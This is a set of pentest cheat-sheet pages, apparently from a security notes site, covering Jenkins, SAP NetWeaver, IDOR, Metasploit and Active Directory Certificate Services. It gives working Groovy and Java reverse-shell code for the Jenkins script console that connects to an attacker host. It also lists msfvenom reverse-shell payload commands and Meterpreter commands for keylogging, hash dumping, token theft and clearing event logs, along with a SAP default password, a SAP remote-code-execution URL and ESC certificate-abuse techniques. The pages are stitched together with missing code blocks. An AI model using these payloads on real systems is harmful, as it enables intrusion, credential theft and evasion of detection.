[NextDrupal](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/drupal) Last updated 1 year ago * [Introduction](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla#introduction) * [Joomla Discovery/Footprinting](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla#joomla-discovery-footprinting) * [Joomla Users and Login Bruteforcing](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla#joomla-users-and-login-bruteforcing) * [Joomla Known Vulnerabilities](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla#joomla-known-vulnerabilities) --- # Jenkins | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/jenkins.md) . **Introduction**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/jenkins#introduction) -------------------------------------------------------------------------------------------------------------------------- > * Jenkins is a continuous integration server. > > * Jenkins runs on Tomcat port 8080 by default > > * The default installation typically uses Jenkins’ database to store credentials and does not allow users to register an account. > > * Jenkins if often inside internal networks > > * Jenkins is often installed on Windows servers running as the SYSTEM account. > > * If we can gain access via Jenkins and gain remote code execution as the SYSTEM account, we would have a foothold in Active Directory to begin enumeration of the domain environment. > > * It is not uncommon to find Jenkins instances that do not require any authentication during an internal penetration test > > * We can fingerprint Jenkins quickly by the telltale login page. > * * * **Jenkins Script Console RCE \[Authenticated\]**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/jenkins#jenkins-script-console-rce-authenticated) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- > * After gaining access to a Jenkins application, you can navigate to the script console: `http://jenkins.test.example:8000/script` > > * The script console allows us to run arbitrary Groovy scripts within the Jenkins controller runtime. > > * This can be abused to run operating system commands on the underlying server. > **Linux PoC Script:** * MSFConsole: `use exploit/multi/http/jenkins_script_console` * Reverse shell: Copy r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/your-attacker-ip/your-nc-port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() **Windows PoC Script:** * Reverse shell: [PreviousGitlab](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/gitlab) [NextMicrosoft IIS](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/microsoft-iis) Last updated 1 year ago * [Introduction](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/jenkins#introduction) * [Jenkins Script Console RCE \[Authenticated\]](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/jenkins#jenkins-script-console-rce-authenticated) Copy String host="your-attacker-ip"; int port=your-nc-port; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); --- # SAP Netweaver | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver.md) . Introduction[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#introduction) ---------------------------------------------------------------------------------------------------------------------------- SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management. The product is marketed as a service-oriented architecture for enterprise application integration. It can be used for custom development and integration with other applications and systems, and is built primarily using the ABAP programming language, but also uses C, C++, and Java. It can also be extended with, and interoperate with, technologies such as Microsoft .NET, Java EE, and IBM WebSphere. * * * Discovery[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#discovery) ---------------------------------------------------------------------------------------------------------------------- You can use Shodan and Google Dorks to check for files, subdomains, and juicy information if the application is Internet-facing or public: Copy inurl:50000/irj/portal inurl:IciEventService/IciEventConf inurl:/wsnavigator/jsps/test.jsp inurl:/irj/go/km/docs/ https://www.shodan.io/search?query=sap+portal https://www.shodan.io/search?query=SAP+Netweaver https://www.shodan.io/search?query=SAP+J2EE+Engine You can also use `gobuster`, `ffuf` and `BurpSuiteIntuder` to scan for files and directory using the following wordlists: * [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/sap.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/sap.txt) * [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/URLs/urls-SAP.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/URLs/urls-SAP.txt) * [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/SAP.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/SAP.fuzz.txt) * [https://raw.githubusercontent.com/chudyPB/sap-wordlist/master/sap-ultimate.txt](https://raw.githubusercontent.com/chudyPB/sap-wordlist/master/sap-ultimate.txt) * * * A typical SAP logon screen ([http://SAP:50000/irj/portal](http://sap:50000/irj/portal) ) looks like the following: ![](https://x3m1sec.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Fx3m1Sec%2Fcpts_notes%2Fblob%2Fmain%2Fpentest-notes%2F.gitbook%2Fassets%2Fsapnetweaver.png&width=768&dpr=3&quality=100&sign=77708c3fe7c81dd2e0cf35d94c22b778&sv=3) SAP Login Page * * * Potential information goldmine paths[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#potential-information-goldmine-paths) ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * Try `/irj/go/km/navigation/` for possible `directory listing` or `authentication bypass` * [http://SAP/sap/public/info](http://sap/sap/public/info) contains some juicy information * * * Default Credentials[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#default-credentials) ------------------------------------------------------------------------------------------------------------------------------------------ Each SAP instance is divided into clients. Each one has a user SAP\*, the application’s equivalent of β€œroot”. Upon initial creation, this user SAP\* gets a default password: β€œ060719992” * * * Known RCE Exploit[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#known-rce-exploit) -------------------------------------------------------------------------------------------------------------------------------------- Try to use some known exploits (check out Exploit-DB) or attacks like the [SAP ConfigServlet Remote Code Execution](https://www.exploit-db.com/exploits/24963) : [PreviousWordPress](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/wordpress) [NextJoomla](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla) Last updated 1 year ago * [Introduction](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#introduction) * [Discovery](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#discovery) * [Potential information goldmine paths](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#potential-information-goldmine-paths) * [Default Credentials](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#default-credentials) * [Known RCE Exploit](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver#known-rce-exploit) Copy http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a --- # Insecure Direct Object References (IDOR) | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/insecure-direct-object-references-idor.md) . **Introduction**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/insecure-direct-object-references-idor#introduction) ---------------------------------------------------------------------------------------------------------------------------------------------------- > * IDOR refers to the ability to interact directly with object by using a reference to their identifier > > * An example of IDOR is whenever a web application uses a guessable id value that can be directly modified by the user (e.g. an id in the URL) > > * As web applications store users' files and information, they may use sequential numbers or user IDs to identify each item. > > * IDOR can lead to accessing data that should not be accessible by attackers. > > * What makes this attack very common is essentially the lack of a solid access control system on the back-end. > > * IDOR _"becomes"_ BROKEN ACCESS CONTROL whenever a user can access other objects which he doesn't have permissions for (e.g. other user's data or admin data) > * * * **Detecting potential IDOR Vulnerabilities**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/insecure-direct-object-references-idor#detecting-potential-idor-vulnerabilities) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ 1. Example: `GET` request with a specific reference to an object by using `?id=NUMBER` 2. Example: `POST` request with a specific reference (in its body) to an object by using `?id=NUMBER` 3. Example: `POST` request with specific user-permissions-related parameters such as `user role o permissions` or `"url":"/abc/data/users/1"` [PreviousFile Upload Vulnerabilities](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads) [NextOS Command Injection](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection) Last updated 1 year ago * [Introduction](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/insecure-direct-object-references-idor#introduction) * [Detecting potential IDOR Vulnerabilities](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/insecure-direct-object-references-idor#detecting-potential-idor-vulnerabilities) --- # Metasploit Framework | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework.md) . **Introduction**[](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#introduction) ------------------------------------------------------------------------------------------------------------------------------------ > The Metasploit Framework is a Ruby-based penetration testing platform that writing, testing, and executing exploit code. Metasploit contains a suite of tools to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. * * * **MSFconsole Commands**[](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#msfconsole-commands) -------------------------------------------------------------------------------------------------------------------------------------------------- Command Description show exploits Show all exploits within the Framework. show payloads Show all payloads within the Framework. setg Set a specific value globally (for example, LHOST or RHOST). show options Show the options available for a module or exploit. show targets Show the platforms supported by the exploit. set target Specify a specific target index if you know the OS and service pack. set payload Specify the payload to use. show advanced Show advanced options. sessions -l List available sessions (used when handling multiple shells). sessions -i Interact with a session sessions -K Kill all live sessions. sessions -c Execute a command on all live Meterpreter sessions. sessions -u Upgrade a normal Win32 shell to a Meterpreter console. * * * **Meterpreter Commands**[](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#meterpreter-commands) ---------------------------------------------------------------------------------------------------------------------------------------------------- Command Description migrate Migrate to the specific process ID (PID is the target process ID gained from the ps command). list\_tokens -u List available tokens on the target by user. list\_tokens -g List available tokens on the target by group. impersonate\_token Impersonate a token available on the target. steal\_token Steal the tokens available for a given process and impersonate that token. drop\_token Stop impersonating the current token. getsystem Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors. shell Drop into an interactive shell with all available tokens. execute -f -i Execute cmd.exe and interact with it. execute -f -i -t Execute cmd.exe with all available tokens. execute -f -i -H -t Execute cmd.exe with all available tokens and make it a hidden process. rev2self Revert back to the original user you used to compromise the target. reg Interact, create, delete, query, set, and much more in the target’s registry. setdesktop Switch to a different screen based on who is logged in. screenshot Take a screenshot of the target’s screen. upload Upload a file to the target. download Download a file from the target. keyscan\_start Start sniffing keystrokes on the remote target. keyscan\_dump Dump the remote keys captured on the target. keyscan\_stop Stop sniffing keystrokes on the remote target. getprivs Get as many privileges as possible on the target. uictl enable Take control of the keyboard and/or mouse. background Run your current Meterpreter shell in the background. hashdump Dump all hashes on the target. use sniffer Load the sniffer module. sniffer\_interfaces List the available interfaces on the target. sniffer\_dump pcapname Start sniffing on the remote target. sniffer\_start packet-buffer Start sniffing with a specific range for a packet buffer. sniffer\_stats Grab statistical information from the interface you are sniffing. sniffer\_stop Stop the sniffer. add\_user -h Add a user on the remote target. add\_group\_user <"Domain Admins"> -h Add a username to the Domain Administrators group on the remote target. clearev Clear the event log on the target machine. timestomp Change file attributes, such as creation date (antiforensics measure). reboot Reboot the target machine. * * * **Common Meterpreter Payloads for Windows**[](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#common-meterpreter-payloads-for-windows) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Payload Description generic/custom Generic listener, multi-use generic/shell\_bind\_tcp Generic listener, multi-use, normal shell, TCP connection binding generic/shell\_reverse\_tcp Generic listener, multi-use, normal shell, reverse TCP connection windows/x64/exec Executes an arbitrary command (Windows x64) windows/x64/loadlibrary Loads an arbitrary x64 library path windows/x64/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon windows/x64/shell\_reverse\_tcp Normal shell, single payload, reverse TCP connection windows/x64/shell/reverse\_tcp Normal shell, stager + stage, reverse TCP connection windows/x64/shell/bind\_ipv6\_tcp Normal shell, stager + stage, IPv6 Bind TCP stager windows/x64/meterpreter/$ Meterpreter payload + varieties above windows/x64/powershell/$ Interactive PowerShell sessions + varieties above windows/x64/vncinject/$ VNC Server (Reflective Injection) + varieties above * * * **Importing External Exploits into MSFConsole**[](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#importing-external-exploits-into-msfconsole) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- > The default directory where all the modules, scripts, plugins, and `msfconsole` proprietary files are stored is `/usr/share/metasploit-framework` Alternatively, you can use the folder `/home/username/.msf4` To import a module, you just need to copy it in one of the previous folders and use the `reload_all` command. Alternatively, you can load a module at runtime by using `loadpath /usr/share/metasploit-framework/modules/`\\ * * * **Meterpreter Pivoting**[](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#meterpreter-pivoting) ---------------------------------------------------------------------------------------------------------------------------------------------------- Command Description portfwd add -R -l 8443 -p 1234 -L 10.10.14.15 Set up a local port forwarding rule to forward all traffic destined to port 1234 on 10.10.14.15 to port 8443 on our attack host run autoroute -s 172.16.9.0/23 set up a route to the 172.16.9.0/23 subnet * * * **Msfconsole & Msfvenom**[](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#msfconsole-and-msfvenom) -------------------------------------------------------------------------------------------------------------------------------------------------------- Commands Description use exploit/windows/smb/psexec Metasploit exploit module that can be used on vulnerable Windows system to establish a shell session utilizing smb & psexec shell Command used in a meterpreter shell session to drop into a system shell msfvenom -p linux/x64/shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf MSFvenom command used to generate a linux-based reverse shell stageless payload msfvenom -p windows/shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe MSFvenom command used to generate a Windows-based reverse shell stageless payload msfvenom -p osx/x86/shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho MSFvenom command used to generate a MacOS-based reverse shell payload msfvenom -p windows/meterpreter/reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp MSFvenom command used to generate a ASP web reverse shell payload msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp MSFvenom command used to generate a JSP web reverse shell payload msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload use auxiliary/scanner/smb/smb\_ms17\_010 Metasploit exploit module used to check if a host is vulnerable to ms17\_010 use exploit/windows/smb/ms17\_010\_psexec Metasploit exploit module used to gain a reverse shell session on a Windows-based system that is vulnerable to ms17\_010 use exploit/linux/http/rconfig\_vendors\_auth\_file\_upload\_rce Metasploit exploit module that can be used to optain a reverse shell on a vulnerable linux system hosting rConfig 3.9.6 * * * **Utilities - Exploit Suggester & HashDump**[](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#utilities-exploit-suggester-and-hashdump) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * `local_exploit_suggester`: useful module for privesc * `hashdump` or `comando lsa_dump_secrets` or `lsa_dump_sam`: commands to dump all passwords \\ * Disclaimer: before using `hashdump` you need to ensure to have `root` or `nt authority system` privileges * To do that, use `ps` to check the permissions of the current process you are on, then use `migrate PID` on a root process, if you aren't root already [PreviousShells and Payloads](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/shells-and-payloads) [NextFile Transfers](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/file-transfers) Last updated 1 year ago * [Introduction](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#introduction) * [MSFconsole Commands](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#msfconsole-commands) * [Meterpreter Commands](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#meterpreter-commands) * [Common Meterpreter Payloads for Windows](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#common-meterpreter-payloads-for-windows) * [Importing External Exploits into MSFConsole](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#importing-external-exploits-into-msfconsole) * [Meterpreter Pivoting](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#meterpreter-pivoting) * [Msfconsole & Msfvenom](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#msfconsole-and-msfvenom) * [Utilities - Exploit Suggester & HashDump](https://x3m1sec.gitbook.io/notes/pentest-notes/utilities-scripts-and-payloads/metasploit-framework#utilities-exploit-suggester-and-hashdump) --- # Active Directory Certificate Services (ADCS) | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds.md) . Introduction to ADCS[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#introduction-to-adcs) ----------------------------------------------------------------------------------------------------------------------------- Active Directory Certificate Services (ADCS) is the role that handles certificate issuance for users, computers, and services in the Active Directory network. When misconfigured, this service can present vulnerabilities that attackers could exploit to escalate privileges or access sensitive information. ### Common ADCS Vulnerabilities[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#common-adcs-vulnerabilities) * **Certificate Issuance Privilege Delegation**: If certain users have permissions to issue certificates for others, an attacker could abuse these privileges to obtain elevated permissions. * **Certificate Template Misconfiguration**: Incorrect configurations in certificate templates could allow an attacker to request a certificate on behalf of another user, including one with elevated privileges. * **NTLM Relaying over HTTP**: If ADCS accepts NTLM authentication instead of Kerberos, an attacker could redirect requests to gain access. ### Main Components[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#main-components) * **CA (Certification Authority)**: Issues and manages certificates. There can be multiple CAs in a hierarchy. * **Certificate Templates**: Define configuration, permissions, and requirements for issuing certificates. * **CES (Certificate Enrollment Server)**: Allows certificate renewal through HTTPS requests. * **Certificate Enrollment Policy Web Server**: Provides information about certificate enrollment policies. * **CA Web Enrollment**: Allows hosts outside the domain or with other operating systems to renew certificates. * **NDES (Network Device Enrollment Service)**: Allows network devices to obtain certificates without connection. ### X.509 Certificate Formats[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#x.509-certificate-formats) * **PEM**: Base64-encoded DER certificate; can store multiple keys without password protection. * **DER**: Certificate in raw binary format. * **PFX/P12 (PKCS#12)**: Stores private keys with password protection. * **P7B (PKCS#7)**: Stores certificate chains but not private keys. ### Main Certificate Attributes[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#main-certificate-attributes) * **Subject**: Entity to which the certificate is issued. * **Issuer**: Usually the CA. * **SAN**: Subject Alternative Name. * **Validity Period**: Certificate validity period. * **EKU (Extended Key Use)**: Defines specific uses of the certificate. * **OID (Object Identifier)**: Indicates the purpose or usage scenario of the certificate. OID Certificate Usage 1.3.6.1.5.5.7.3.1 Server Authentication 1.3.6.1.5.5.7.3.2 Client Authentication 1.3.6.1.5.5.7.3.3 Code Signing 1.3.6.1.5.5.7.3.4 Secure Email ### CSR (Certificate Signing Request) Process[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#csr-certificate-signing-request-process) 1. Client sends a certificate request (CSR). 2. CA verifies client permissions to issue the requested certificate. 3. If permissions match, CA generates and signs the certificate with its private key. 4. Signed certificate is returned to the client. Checking Misconfigured Templates[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#checking-misconfigured-templates) ----------------------------------------------------------------------------------------------------------------------------------------------------- We'll use **Certipy** for privilege escalation with ADCS. **GitHub Repository**: [ly4k/Certipy](https://github.com/ly4k/Certipy) To check for misconfigured templates that we can abuse: Common Issues and Solutions[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#common-issues-and-solutions) ------------------------------------------------------------------------------------------------------------------------------------------- ### KDC\_ERR\_PADATA\_TYPE\_NOSUPP Error[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#kdc_err_padata_type_nosupp-error) This error occurs when attempting to authenticate with a user's PFX certificate, indicating that the KDC doesn't support the provided authentication type. **Common Causes:** * Domain controller doesn't have a certificate installed for smart cards * DC lacks "Domain Controller", "Domain Controller Authentication", or another certificate with Server Authentication EKU * Wrong CA is being queried or proper CA cannot be contacted **Solution**: Use **PassTheCert** to authenticate to LDAP via SChannel: ESC Attack Techniques[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc-attack-techniques) ------------------------------------------------------------------------------------------------------------------------------- ### ESC1 - Domain Users Enrollment[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc1-domain-users-enrollment) Certificate request with alternative SAN. #### Standard Users[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#standard-users) **Certificate Authentication:** #### Domain Computers (Machine Account)[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#domain-computers-machine-account) When ESC1 is only available through Domain Computers: ### ESC2[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc2) Certificate request with alternative SAN: **Authentication:** **Verification:** ### ESC3[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc3) Request certificate and then impersonate administrator: ### ESC4[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc4) Modify vulnerable template: ### ESC5[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc5) Request and approve certificate: ### ESC6[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc6) Certificate request with alternative UPN: ### ESC7[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc7) **Prerequisites**: User must have "Manage CA" and "Manage Certificates" access rights, and SubCA template must be enabled. ### ESC8[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc8) NTLM Relay attack: **Possible follow-up attacks:** **DCSync Attack (if Domain Admin privileges):** **Silver Ticket (using machine account NTLM hash):** ### ESC9[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc9) **Requirements**: GenericWrite or GenericAll over account A to compromise account B. ### ESC10[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc10) #### Case 1: Standard Account Compromise[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#case-1-standard-account-compromise) #### Case 2: Machine Account Compromise[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#case-2-machine-account-compromise) ### ESC11[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc11) RPC-based relay attack: Follow ESC8 steps after successful relay. ### ESC13[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc13) Policy-based certificate template exploitation: Use certificate with Pass-the-Certificate for TGT with additional group privileges. ### ESC14[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc14) #### Scenario A: Write altSecurityIdentities on Target[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#scenario-a-write-altsecurityidentities-on-target) **X509 Parser Script** (`x509.py`): ### ESC15[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc15) **Description**: Certificate template allows authentication via Client Authentication EKU with altSecurityIdentities configured to use non-compliant Subject Alternative Name (SAN) values. **Requirements**: Access to an account with certificate enrollment permissions, vulnerable certificate template with Client Authentication EKU, and permissive SAN configuration. #### Detection[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#detection) First, identify vulnerable templates using Certipy: Look for templates that allow: * Client Authentication in Extended Key Usage (EKU) * ENROLLEE\_SUPPLIES\_SUBJECT flag set * No manager approval required * Certificate Request Agent not required #### Method 1: UPN Impersonation with Password Change (Destructive)[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#method-1-upn-impersonation-with-password-change-destructive) This method involves changing the target administrator's password, making it detectable but straightforward: #### Method 2: On-Behalf-Of Request (Stealthy)[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#method-2-on-behalf-of-request-stealthy) This method is more stealthy as it doesn't modify the administrator's password: #### Method 3: Direct Certificate Authentication[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#method-3-direct-certificate-authentication) Alternative approach using certificate for direct LDAP authentication: **Note**: ESC15 vulnerabilities typically arise from misconfigured certificate templates that allow Subject Alternative Name spoofing combined with Client Authentication capabilities. Always verify the specific template configuration and adjust the exploitation approach accordingly. ### ESC16[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc16) Security Extension disabled on CA. #### Scenario A: UPN Manipulation[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#scenario-a-upn-manipulation) **Requirements**: StrongCertificateBindingEnforcement = 1 (Compatibility) or 0 (Disabled) on DCs, and attacker has write access to victim's UPN. Tools and Resources[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#tools-and-resources) --------------------------------------------------------------------------------------------------------------------------- ### Primary Tools[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#primary-tools) * **Certipy**: Main tool for ADCS enumeration and exploitation * **PassTheCert**: Certificate-based authentication when PKINIT is not supported * **PowerView**: Domain enumeration and computer account management * **BloodHound**: Active Directory relationship mapping * **Coercer**: Authentication coercion attacks ### Useful References[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#useful-references) * [Certipy GitHub Repository](https://github.com/ly4k/Certipy) * [PassTheCert GitHub Repository](https://github.com/AlmondOffSec/PassTheCert) * [The Hacker Recipes - Certificate Authority](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-authority) * [SpecterOps ADCS Research](https://posts.specterops.io/certified-pre-owned-d95910965cd2) Notes and Best Practices[](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#notes-and-best-practices) ------------------------------------------------------------------------------------------------------------------------------------- 1. **Always save original configurations** when modifying templates (ESC4, ESC7) 2. **Revert changes** after successful exploitation to minimize detection 3. **Handle timeouts** - If receiving "NETBIOS connection timeout" errors, retry the commands 4. **Certificate validation** - Ensure proper certificate validation when authenticating 5. **Privilege verification** - Always verify obtained privileges match expected access levels [PreviousAbusing ACLs/ACEs](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/ad-acl-abuse) [NextAttacking Kerberos](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/attacking-kerberos) Last updated 1 year ago * [Introduction to ADCS](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#introduction-to-adcs) * [Common ADCS Vulnerabilities](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#common-adcs-vulnerabilities) * [Main Components](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#main-components) * [X.509 Certificate Formats](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#x.509-certificate-formats) * [Main Certificate Attributes](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#main-certificate-attributes) * [CSR (Certificate Signing Request) Process](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#csr-certificate-signing-request-process) * [Checking Misconfigured Templates](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#checking-misconfigured-templates) * [Common Issues and Solutions](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#common-issues-and-solutions) * 